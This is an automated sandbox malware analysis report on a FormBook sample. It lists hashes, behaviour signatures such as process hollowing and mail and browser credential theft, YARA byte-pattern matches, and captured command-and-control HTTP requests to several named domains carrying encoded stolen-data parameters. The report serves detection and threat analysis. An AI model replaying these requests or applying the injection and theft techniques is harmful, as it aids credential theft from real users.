Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:	file.exe
Analysis ID:	791404
MD5:	58b8732ed17532b518bd90b68b934b23
SHA1:	dbb672289a9ebde17cb77424615a1c186995d1f3
SHA256:	f6eb53bca5075725d889aa5de1f4541cd764bed2bd46aeefcfa4a1b018b6a4fb
Tags:	NETexeMSIL
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected FormBook

Malicious sample detected (through community Yara rule)

Antivirus / Scanner detection for submitted sample

System process connects to network (likely due to code injection or exploit)

Antivirus detection for URL or domain

Sample uses process hollowing technique

Tries to steal Mail credentials (via file / registry access)

Maps a DLL or memory area into another process

Writes to foreign memory regions

Machine Learning detection for sample

Allocates memory in foreign processes

.NET source code contains potential unpacker

Injects a PE file into a foreign processes

Queues an APC in another process (thread injection)

Modifies the context of a thread in another process (thread injection)

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Tries to harvest and steal browser information (history, passwords, etc)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Contains long sleeps (>= 3 min)

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Sample file is different than original file name gathered from version info

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Checks if the current process is being debugged

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w10x64

file.exe (PID: 908 cmdline: C:\Users\user\Desktop\file.exe MD5: 58B8732ED17532B518BD90B68B934B23)

CasPol.exe (PID: 240 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe MD5: F866FC1C2E928779C7119353C3091F0C)

explorer.exe (PID: 3452 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

wlanext.exe (PID: 5544 cmdline: C:\Windows\SysWOW64\wlanext.exe MD5: CD1ED9A48316D58513D8ECB2D55B5C04)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000002.309105530.0000000001110000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000001.00000002.309105530.0000000001110000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x1f010:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xae3f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x18237:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000001.00000002.309105530.0000000001110000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x18035:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x17ad1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x18137:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x182af:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xaa0a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x16d1c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1ddb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ed6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000A.00000002.525917606.0000000000BF0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000A.00000002.525917606.0000000000BF0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x1f010:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xae3f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x18237:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000000A.00000002.525917606.0000000000BF0000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x18035:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x17ad1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x18137:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x182af:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xaa0a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x16d1c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1ddb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ed6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000A.00000002.525981874.0000000000C20000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000A.00000002.525981874.0000000000C20000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x1f010:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xae3f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x18237:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000000A.00000002.525981874.0000000000C20000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x18035:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x17ad1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x18137:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x182af:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xaa0a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x16d1c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1ddb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ed6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.308980248.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000001.00000002.308980248.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x20e43:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xcc72:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x1a06a:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000001.00000002.308980248.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x19e68:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x19904:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x19f6a:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1a0e2:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xc83d:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x18b4f:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1fbea:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x20b9d:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000A.00000002.524739251.0000000000550000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000A.00000002.524739251.0000000000550000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x1f010:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xae3f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x18237:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000000A.00000002.524739251.0000000000550000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x18035:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x17ad1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x18137:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x182af:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xaa0a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x16d1c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1ddb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ed6a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Click to see the 10 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.2.CasPol.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
1.2.CasPol.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x20e43:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xcc72:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x1a06a:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
1.2.CasPol.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x19e68:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x19904:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x19f6a:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1a0e2:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xc83d:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x18b4f:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1fbea:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x20b9d:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.CasPol.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
1.2.CasPol.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x20043:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xbe72:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x1926a:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
1.2.CasPol.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x19068:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x18b04:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x1916a:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x192e2:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xba3d:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x17d4f:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1edea:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1fd9d:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Click to see the 1 entries

HTTP traffic detected: POST /crhz/ HTTP/1.1Host: www.n-r-eng.comConnection: closeContent-Length: 185Cache-Control: no-cacheOrigin: http://www.n-r-eng.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.n-r-eng.com/crhz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4d 6b 6e 3d 44 30 56 48 4d 42 42 4d 49 71 41 79 7a 4a 7e 67 54 63 42 5a 72 74 71 51 71 69 6c 78 30 71 32 37 34 4f 41 5a 70 71 68 55 41 6c 45 6c 4c 75 42 39 45 6c 43 64 67 4b 64 69 48 48 68 68 6e 6b 45 4f 56 61 71 65 4b 75 4e 59 71 48 42 5a 52 46 38 72 48 33 6d 79 7a 2d 41 30 47 52 75 67 38 4b 46 32 59 5a 38 4b 42 36 73 33 42 31 51 4a 46 41 7a 79 35 36 58 2d 77 4e 67 31 74 4f 73 50 6b 39 43 39 75 53 6d 58 73 70 6b 36 49 77 6c 73 5a 52 42 47 4c 45 4a 42 75 75 49 31 79 5a 46 37 44 46 54 4d 4c 5a 49 44 43 5f 71 4d 44 41 72 77 6a 36 73 5f 52 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: Mkn=D0VHMBBMIqAyzJ~gTcBZrtqQqilx0q274OAZpqhUAlElLuB9ElCdgKdiHHhhnkEOVaqeKuNYqHBZRF8rH3myz-A0GRug8KF2YZ8KB6s3B1QJFAzy56X-wNg1tOsPk9C9uSmXspk6IwlsZRBGLEJBuuI1yZF7DFTMLZIDC_qMDArwj6s_Rw).

Source: unknown

DNS traffic detected: queries for: www.laylaroseuk.com

Source: C:\Windows\explorer.exe

Code function: 2_2_0B7214F2 getaddrinfo,SleepEx,setsockopt,recv,recv,

2_2_0B7214F2

Source: global traffic	HTTP traffic detected: GET /crhz/?Mkn=1rNCCz7kTcLTieqVkhzplJgcoI94HvPGoNH0lVnmkmFXwmlt9jZmgzPB/kdX+WOK+rGt5Wg7VkzKMCVbaV5xHn8QLAS8Zm4ynQ==&vux=DmStydFUWc8HD HTTP/1.1Host: www.laylaroseuk.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /crhz/?Mkn=O29nP3ATS/5Z6K6ZOqFFpve/mTBG7paw5+pol+lVZCotPeZJEV3KnsQwBw1FpEdPbpeQCJZSqBlkKVIQIQyxkbVFYCGm9IFlQQ==&vux=DmStydFUWc8HD HTTP/1.1Host: www.n-r-eng.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /crhz/?Mkn=LNHYCELR2jrkl6ex9ablCycu9h3K7h+sZB96ERWJZAieoidRiLebg6j0RcHsFDDJ9r29OHFtYH9IplqsElTGHGtv/xv4Is4Luw==&vux=DmStydFUWc8HD HTTP/1.1Host: www.sandpiper-apts.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /crhz/?Mkn=4blG9eK7alfY4URLGxkOib9O4UWCECbcMJ2fHD64T+pOqyJeQKS/uT906cjCl4jdAQhvn7mHg7wgiqcNtMEmRdiQ98V40n9u5A==&vux=DmStydFUWc8HD HTTP/1.1Host: www.tf8dangky.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /crhz/?Mkn=4Z6KAxgBWslvyWQs2zz1LTCSIJZnXz/Wr59nnN1quAvIIyJUwPyWYoHYYm82bfT5dpIzg2ZgrTpqnEgpaKo2QZ2CGF/wkiG+Fw==&vux=DmStydFUWc8HD HTTP/1.1Host: www.teammart.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /crhz/?Mkn=CCCEekJcxP1BHV4uutXMBlMorQncoYcW7RlEC0I+F0KDkaobIF+zubJ5fpyHcR0fDKGG4SO4PI1fmloML0V9OkWwUAiG/UylYA==&vux=DmStydFUWc8HD HTTP/1.1Host: www.suachuadienlanh247.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /crhz/?Mkn=tmPv/9YflmeFyaovhpy86TX5rNY2iNLCfFTw46C4YL4FjsvtgGKrRmf5O7NIQw/qRR8QJqKEWoluew4y5+XeQGQX6k9pc/6NhQ==&vux=DmStydFUWc8HD HTTP/1.1Host: www.hvlandscapes.bizConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /crhz/?Mkn=iycDOFv4tLFlCihz1M/bkpzttTI3wOwIoAcOv31GIYKsRKZ8f8EzkP6Z56SPUyztaOnMa+iauXtsUeY/SnJDQAP7ZwMaqvgwrA==&vux=DmStydFUWc8HD HTTP/1.1Host: www.frogair.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: file.exe, 00000000.00000002.259190786.000000000125A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Source: C:\Windows\explorer.exe

Code function: 2_2_0B71AE22 OpenClipboard,

2_2_0B71AE22

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 1.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.309105530.0000000001110000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.525917606.0000000000BF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.525981874.0000000000C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.308980248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.524739251.0000000000550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 1.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 1.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 1.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.309105530.0000000001110000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000001.00000002.309105530.0000000001110000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.525917606.0000000000BF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.525917606.0000000000BF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.525981874.0000000000C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.525981874.0000000000C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.308980248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000001.00000002.308980248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.524739251.0000000000550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.524739251.0000000000550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 1.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 1.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 1.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.309105530.0000000001110000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000002.309105530.0000000001110000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.525917606.0000000000BF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.525917606.0000000000BF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.525981874.0000000000C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.525981874.0000000000C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.308980248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000002.308980248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.524739251.0000000000550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.524739251.0000000000550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02DF1AE0	0_2_02DF1AE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02DF0448	0_2_02DF0448
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02DF5470	0_2_02DF5470
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02DF0BA1	0_2_02DF0BA1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02DF2971	0_2_02DF2971
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02DF1ACF	0_2_02DF1ACF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02DF0438	0_2_02DF0438
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02DF0388	0_2_02DF0388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_00401840	1_2_00401840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 1_2_0040C043	1_2_0040C043
